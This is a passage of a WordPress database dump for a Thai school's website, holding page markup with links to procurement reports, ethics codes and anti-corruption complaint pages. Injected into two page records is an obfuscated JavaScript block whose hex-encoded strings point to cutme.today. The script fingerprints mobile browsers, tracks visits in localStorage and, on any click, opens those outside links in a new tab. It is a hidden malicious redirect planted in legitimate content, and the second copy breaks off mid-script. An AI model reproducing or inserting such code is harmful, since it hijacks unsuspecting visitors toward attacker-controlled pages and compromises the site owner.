class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1558\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1502\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','publish','closed','closed','','ita-online-2567','','','2025-07-08 10:56:52','2025-07-08 03:56:52','',0,'http://pakhaeng.ssk.in.th/?page_id=871',0,'page','',0),
(872,1,'2024-08-19 12:09:32','2024-08-19 05:09:32','<!-- wp:generateblocks/container {\"uniqueId\":\"74e53c05\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"608409cd\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-608409cd gb-headline-text\"><strong>ข้อมูลพื้นฐาน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:kadence/iconlist {\"uniqueID\":\"871_db0f60-10\",\"icon\":\"fe_arrowRight\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_db0f60-10 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_f0fbcd-0d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_f0fbcd-0d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 